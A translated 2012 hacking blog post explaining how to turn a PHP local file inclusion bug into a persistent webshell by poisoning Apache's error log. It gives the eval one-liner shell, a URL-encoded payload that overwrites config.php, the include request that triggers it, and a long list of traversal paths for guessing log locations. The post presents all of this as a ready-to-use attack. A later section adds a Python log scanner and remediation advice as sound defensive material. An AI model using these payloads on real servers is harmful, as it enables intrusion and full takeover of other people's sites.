PHP include: writing a shell via the Apache log

Posted on 2012-9-15 14:27:40
Because the approach above is not very practical (in my testing I found the log file easily reaches tens of megabytes, which makes it no fun to play with), let's take it a step further: we write a real, usable webshell, which is also far better than the painfully slow method above.

For example, still the same one-line shell:

<?eval($_POST[cmd]);?>

By now you may have already thought of it: this is a pretty good method. Read on, because how to write it becomes the question. Use this: fopen opens the file /home/virtual/www.xxx.com/forum/config.php, then we write the one-line shell's server-side statement <?eval($_POST[cmd]);?> into it. Put together as a PHP statement, that is:

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
fclose($fp);?>   // writes the one-line shell statement into config.php

We submit this, get Apache to record it in the error log, and then include the log, which writes the shell. Remember that it must be converted to URL-encoded form, or it will not work.

Converted, it becomes:

%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
fclose%28%24fp%29%3B%3F%3E

We submit:

http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

The error log now records this line of code that writes the webshell.

Next we include the log by submitting:

http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

With that the webshell has been written: config.php now contains the one-line shell statement.

OK.

http://www.xxx.com/forum/config.php has now become our webshell.
Connect to it directly with lanker's client and the host is yours.

PS: Everything above assumes the directory permissions are writable; they must be -rwxrwxrwx (777) to proceed, which you check directly with the directories listed above. Everything above is exploitation in the case where the log path is already known.

Other log paths you can guess, or refer to these:

../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log
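The technique described in this post leaves two traces in the web server's own logs: first a request whose path carries PHP code (which Apache then records in its access log and, for a 404, in its error log), and later a request that feeds one of the log paths listed above to a vulnerable include parameter. The following Python script, added here as an example and not part of the original post, scans Apache log lines for either pattern. It goes a little beyond the post by handling both access-log and error-log lines and by undoing repeated URL encoding. The log lines, IP addresses and the host name www.example.com are constructed samples; the z.php?zizzy= parameter is the one named in the post and stands for any include parameter.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (not taken from the original post). Line 1 is a
# benign request; line 2 is a poisoning attempt whose path carries URL-encoded
# PHP; line 3 is the error-log entry Apache writes for that 404, with the path
# already decoded; line 4 feeds a log path to an include parameter.
SAMPLE_LOG = """\
203.0.113.5 - - [15/Sep/2012:14:27:40 +0800] "GET /forum/index.php HTTP/1.1" 200 5123
203.0.113.9 - - [15/Sep/2012:14:28:01 +0800] "GET /%3C%3Fphp+echo+1%3B%3F%3E HTTP/1.1" 404 209
[Sat Sep 15 14:28:01 2012] [error] [client 203.0.113.9] File does not exist: /home/virtual/www.example.com/<?php echo 1;?>
203.0.113.9 - - [15/Sep/2012:14:28:30 +0800] "GET /z.php?zizzy=../../../../var/log/apache/error_log HTTP/1.1" 200 77
"""

# The request-line part of an access-log entry: method, target, protocol.
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# A PHP open tag inside a request is never legitimate; "<?xml" is the one
# common false positive, so it is excluded.
PHP_TAG = re.compile(r"<\?(?!xml\b)", re.IGNORECASE)

# Directory traversal or a well-known log directory inside a request target;
# the directory names are the ones that appear in the list in the post above.
LOG_PATH = re.compile(
    r"\.\./|/var/log/|/var/www/logs/|/etc/httpd/logs/|/usr/local/apache/logs/|apache/logs/",
    re.IGNORECASE,
)


def decode_fully(text: str, rounds: int = 3) -> str:
    """Undo percent-encoding repeatedly so double-encoded payloads
    (e.g. %253C for '<') are still caught; stops as soon as another
    decoding pass no longer changes the text."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def classify(line: str) -> list:
    """Return the suspicious patterns found in one log line.
    For access-log lines only the request target is inspected; error-log
    lines have no request line, so the whole message is inspected."""
    match = REQUEST.search(line)
    subject = decode_fully(match.group("target") if match else line)
    findings = []
    if PHP_TAG.search(subject):
        findings.append("php-code")
    if LOG_PATH.search(subject):
        findings.append("log-path")
    return findings


def scan(log_text: str) -> list:
    """Scan a whole log and return (line number, findings) for every
    line that triggers at least one pattern."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        findings = classify(line)
        if findings:
            hits.append((number, findings))
    return hits


if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(findings)}")
```

Run it against a real log with scan(open(path).read()). Detection is the second line of defence; the root cause is an include() that takes a user-supplied path, so the fix is an allowlist of includable files rather than raw request input, with open_basedir and a log directory the web server's user cannot read as defence in depth. The post's own note that the target directory must be world-writable (777) points at a further misconfiguration worth auditing.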